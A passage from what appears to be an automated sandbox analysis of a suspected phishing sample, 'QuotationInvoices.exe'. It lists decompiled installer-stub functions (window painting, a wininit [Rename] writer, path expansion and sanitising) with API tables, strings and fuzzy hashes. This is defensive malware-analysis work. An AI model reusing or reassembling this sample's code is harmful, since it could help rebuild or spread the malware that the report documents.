				_t86 =  *( *0x42f454 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				 *0x429884 = 0;
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x429884 = 0;
				return 0;
			}

0x0040444c
0x00404571
0x004045cd
0x004045d1
0x0040469e
0x004046a0
0x004046a0
0x004046a6
0x004046a6
0x004046a9
0x00000000
0x004046b0
0x004045df
0x004045e1
0x004045eb
0x004045f6
0x004045f9
0x004045fc
0x00404607
0x0040460a
0x00404611
0x0040461f
0x00404637
0x00404639
0x0040463b
0x00404641
0x00404650
0x00404652
0x00404652
0x00404611
0x0040465c
0x00000000
0x00404667
0x0040466b
0x0040467c
0x0040467c
0x00404682
0x00404690
0x00404690
0x00000000
0x00404694
0x0040465c
0x0040457c
0x00000000
0x00404590
0x00404596
0x0040459c
0x00000000
0x00000000
0x004045c1
0x004045c3
0x004045c8
0x00000000
0x004045c8
0x0040457c
0x00404452
0x00404455
0x0040445a
0x0040445c
0x0040446b
0x0040446b
0x00404472
0x00404475
0x00404477
0x0040447c
0x00404485
0x0040448b
0x00404497
0x0040449a
0x004044a3
0x004044a8
0x004044ab
0x004044b0
0x004044c7
0x004044ce
0x004044e1
0x004044e4
0x004044f9
0x00404500
0x00404505
0x0040450a
0x0040450a
0x00404519
0x00404528
0x0040453a
0x0040453f
0x0040454f
0x00404551
0x00000000

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004044C7
GetDlgItem.USER32 ref: 004044DB
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004044F9
GetSysColor.USER32(?), ref: 0040450A
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404519
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404528
lstrlenA.KERNEL32(?), ref: 0040452B
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040453A
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040454F
GetDlgItem.USER32 ref: 004045B1
SendMessageA.USER32(00000000), ref: 004045B4
GetDlgItem.USER32 ref: 004045DF
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040461F
LoadCursorA.USER32 ref: 0040462E
SetCursor.USER32(00000000), ref: 00404637
LoadCursorA.USER32 ref: 0040464D
SetCursor.USER32(00000000), ref: 00404650
SendMessageA.USER32(00000111,00000001,00000000), ref: 0040467C
SendMessageA.USER32(00000010,00000000,00000000), ref: 00404690

Strings

N, xrefs: 004045CD
B, xrefs: 0040463B

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N$B
API String ID: 3103080414-4074832742
Opcode ID: b933b9ecc43e31cfc63bc3248a7489c66971f92386d9d85ac5963e61a52be2be
Instruction ID: c8b3317feb23aa92da8c88ca1c3cf39d399e1714613d550ff25a6b2d3c0ef38e
Opcode Fuzzy Hash: b933b9ecc43e31cfc63bc3248a7489c66971f92386d9d85ac5963e61a52be2be
Instruction Fuzzy Hash: 3761A1B1A40209BFDB109F61CD45F6A3BA9FB84744F00443AFB05BA1D1D7BDA9618F98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42f454;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "Setup Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42f448;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,Setup Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

Setup Setup, xrefs: 00401150
F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$Setup Setup
API String ID: 941294808-1602013819
Opcode ID: cd331e12ae0955bb205525083ccead6a312c2f6528c49d50c92112df1f80047c
Instruction ID: 0ac27d016dd37b64d299d3f81b39716040336c4aee851974846d4d7042c5b915
Opcode Fuzzy Hash: cd331e12ae0955bb205525083ccead6a312c2f6528c49d50c92112df1f80047c
Instruction Fuzzy Hash: CA419C71800249AFCF058FA5DE459AF7FB9FF44314F00802AF991AA1A0C778EA55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405EBC, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405EBC(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x42c648 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca48, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x42c248, "%s=%s\r\n", 0x42c648, 0x42ca48);
						_t53 = _t52 + 0x10;
						E004062E0(_t37, 0x400, 0x42ca48, 0x42ca48,  *((intOrPtr*)( *0x42f454 + 0x128)));
						_t12 = E00405DE6(0x42ca48, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405E5E(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405D4B(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405D4B(_t38, _t21 + 0xa, 0x40a3f0);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405DA1(_t24 + _t46, 0x42c248, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405E8D(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405DE6(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x42c648, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00405ebc
0x00405ec5
0x00405ecc
0x00405ee0
0x00405f08
0x00405f13
0x00405f17
0x00405f37
0x00405f3e
0x00405f48
0x00405f55
0x00405f5a
0x00405f5f
0x00405f63
0x00405f72
0x00405f74
0x00405f81
0x00405f85
0x00406020
0x00000000
0x00405f9b
0x00405fa8
0x00405fcc
0x00405fd0
0x00405fef
0x00405ff3
0x00405ff3
0x00405ff5
0x00405ffe
0x00406009
0x00406014
0x0040601a
0x00000000
0x0040601a
0x00405fd2
0x00405fd5
0x00405fe0
0x00405fdc
0x00405fde
0x00405fdf
0x00405fdf
0x00405fe7
0x00405fe9
0x00000000
0x00405fe9
0x00405fb3
0x00405fb9
0x00000000
0x00405fb9
0x00405f85
0x00405f63
0x00405ee2
0x00405eed
0x00405ef6
0x00405efa
0x00000000
0x00000000
0x00405efa
0x0040602b

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,0040604D,?,?), ref: 00405EED
GetShortPathNameA.KERNEL32(?,0042C648,00000400), ref: 00405EF6

Part of subcall function 00405D4B: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5B
Part of subcall function 00405D4B: lstrlenA.KERNEL32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8D

GetShortPathNameA.KERNEL32(?,0042CA48,00000400), ref: 00405F13
wsprintfA.USER32 ref: 00405F31
GetFileSize.KERNEL32(00000000,00000000,0042CA48,C0000000,00000004,0042CA48,?,?,?,?,?), ref: 00405F6C
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F7B
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB3
SetFilePointer.KERNEL32(0040A3F0,00000000,00000000,00000000,00000000,0042C248,00000000,-0000000A,0040A3F0,00000000,[Rename],00000000,00000000,00000000), ref: 00406009
GlobalFree.KERNEL32 ref: 0040601A
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406021

Part of subcall function 00405DE6: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\QuotationInvoices.exe,80000000,00000003), ref: 00405DEA
Part of subcall function 00405DE6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C

Strings

[Rename], xrefs: 00405F9B, 00405FAD
%s=%s, xrefs: 00405F27

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: aa6939ac238f388c35aac3f6ed86af9ca24a124bbe4c5df02d85bba9ad26e0ee
Instruction ID: 93867bad2f833244898b90dcbcfca195f0b3b673d55ab92eabf696d68ffba162
Opcode Fuzzy Hash: aa6939ac238f388c35aac3f6ed86af9ca24a124bbe4c5df02d85bba9ad26e0ee
Instruction Fuzzy Hash: 29310371640B16ABC2306B659D48F6B3A5CDF45758F14003BF942F62C2EA7CE8118AAD

Uniqueness

Uniqueness Score: -1.00%

Function 004062E0, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 199
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004062E0(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x42ec1c; // 0x4bcdc2
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x42f498;
				_t39 = 0x42e3e0;
				_t90 = 0x42e3e0;
				if(_a4 >= 0x42e3e0 && _a4 - 0x42e3e0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E004062E0(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x42e3e0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x430000;
							E0040624D(_t90, (_t97 << 0xa) + 0x430000);
						} else {
							E004061AB(_t90,  *0x42f448);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E00406528(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42f44c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x42f4e4;
						if( *0x42f4e4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x42f444;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x42f448,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x42f448,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E00406134((_t80 & 0x0000003f) +  *0x42f498, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f498, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E004062E0(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E0040624D(_a4, _t39);
			}

0x004062e0
0x004062e0
0x004062e0
0x004062e6
0x004062eb
0x004062ed
0x004062fc
0x004062fc
0x00406304
0x00406305
0x00406306
0x00406307
0x0040630a
0x00406312
0x00406314
0x0040632b
0x0040632e
0x0040632e
0x00406505
0x00406505
0x00406509
0x00000000
0x00000000
0x0040633b
0x00406341
0x00000000
0x00000000
0x00406347
0x00406348
0x0040634b
0x0040634e
0x004064f8
0x00406502
0x00406504
0x00406504
0x004064fa
0x004064fc
0x004064fe
0x004064ff
0x004064ff
0x00000000
0x004064f8
0x00406354
0x00406358
0x00406368
0x0040636f
0x00406372
0x0040637a
0x0040637d
0x00406384
0x00406385
0x00406388
0x004064a5
0x004064a8
0x004064d8
0x004064db
0x004064e0
0x004064e4
0x004064e4
0x004064e9
0x004064ef
0x004064f1
0x00000000
0x004064f1
0x004064aa
0x004064ad
0x004064c2
0x004064c9
0x004064af
0x004064b6
0x004064b6
0x004064d1
0x004064d4
0x0040649d
0x0040649e
0x0040649e
0x00000000
0x004064d4
0x0040638e
0x00406395
0x00406397
0x00406398
0x004063b2
0x004063b2
0x004063b9
0x004063b9
0x004063c0
0x004063c4
0x004063c4
0x004063c5
0x004063c7
0x00406400
0x00406403
0x00406413
0x00406416
0x0040641e
0x00406424
0x00406424
0x00406483
0x00406483
0x00406485
0x00000000
0x00000000
0x00406428
0x0040642f
0x00406430
0x00406432
0x0040644c
0x0040645a
0x00406460
0x00406462
0x00406480
0x00406480
0x00406480
0x00000000
0x00406480
0x00406468
0x00406471
0x00406474
0x0040647a
0x0040647e
0x00000000
0x00000000
0x00000000
0x0040647e
0x00406434
0x00406437
0x00000000
0x00000000
0x00406446
0x00406448
0x0040644a
0x00000000
0x00000000
0x00000000
0x0040644a
0x00000000
0x00406483
0x0040640b
0x00000000
0x004063c9
0x004063e4
0x004063e9
0x004063ec
0x0040648c
0x0040648c
0x00406490
0x00406498
0x00406498
0x00000000
0x00406490
0x004063f6
0x00406487
0x00406487
0x0040648a
0x00000000
0x00000000
0x00000000
0x0040648a
0x004063c7
0x0040639a
0x0040639e
0x00000000
0x00000000
0x004063a0
0x004063a4
0x00000000
0x00000000
0x004063a6
0x004063aa
0x00000000
0x004063ac
0x004063ac
0x00000000
0x004063ac
0x004063aa
0x0040650f
0x00406519
0x00406525
0x00406525
0x00000000

APIs

GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 0040640B
GetWindowsDirectoryA.KERNEL32(Call,00000400,?,0042A098,00000000,004053AC,0042A098,00000000), ref: 0040641E
SHGetSpecialFolderLocation.SHELL32(004053AC,00000000,?,0042A098,00000000,004053AC,0042A098,00000000), ref: 0040645A
SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00406468
CoTaskMemFree.OLE32(00000000), ref: 00406474
lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406498
lstrlenA.KERNEL32(Call,?,0042A098,00000000,004053AC,0042A098,00000000,00000000,00000000,00000000), ref: 004064EA

Strings

Call, xrefs: 0040630A, 004063D7, 004063D8, 004063D9, 004063F5, 0040640A, 0040641D, 00406439, 00406464, 00406497, 0040649D, 004064B5, 004064C8, 004064E3, 004064E9, 004064F1, 0040651B
Software\Microsoft\Windows\CurrentVersion, xrefs: 004063DA
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406492

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-1230650788
Opcode ID: 116f694ca47b2294ea13ab99a6c6e8b5a49a04805e258c6f634d98d242d16d5f
Instruction ID: cb9956cf134697f00dd0045f5d81f520e4bdc76bf78ec342c260f9164b19bc27
Opcode Fuzzy Hash: 116f694ca47b2294ea13ab99a6c6e8b5a49a04805e258c6f634d98d242d16d5f
Instruction Fuzzy Hash: 5F611571A00104AEEB219F64DD85BBE3BA4AB15314F56413FE903B62D1D37C89A2CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00406528, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406528(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405C52(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405C10("*?|<>/\":", _t5))) == 0) {
							E00405DA1(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x0040652a
0x00406532
0x00406546
0x00406546
0x0040654c
0x00406559
0x00406559
0x0040655a
0x0040655c
0x00406560
0x00406562
0x0040656b
0x0040656d
0x00406587
0x0040658f
0x0040658f
0x00406594
0x00406596
0x00406598
0x0040659c
0x0040659d
0x004065a0
0x004065a8
0x004065aa
0x004065ae
0x00000000
0x00000000
0x004065b4
0x004065b9
0x00000000
0x00000000
0x00000000
0x004065b9
0x004065be

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\QuotationInvoices.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406580
CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040658D
CharNextA.USER32(?,"C:\Users\user\Desktop\QuotationInvoices.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406592
CharPrevA.USER32(?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004065A2

Strings

"C:\Users\user\Desktop\QuotationInvoices.exe" , xrefs: 00406564
C:\Users\user\AppData\Local\Temp\, xrefs: 00406529
*?|<>/":, xrefs: 00406570

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\QuotationInvoices.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-615757309
Opcode ID: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
Instruction ID: 84dc9c54e44743018b56ada6ed00289937fbd1a3950c851798eb23a5f2cb525a
Opcode Fuzzy Hash: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
Instruction Fuzzy Hash: CA1108514047A13AFB3216286C45B777F894F97754F1904BFE8C6722C6C67C5CA2827D

Uniqueness

Uniqueness Score: -1.00%

Function 00404338, Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404338(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
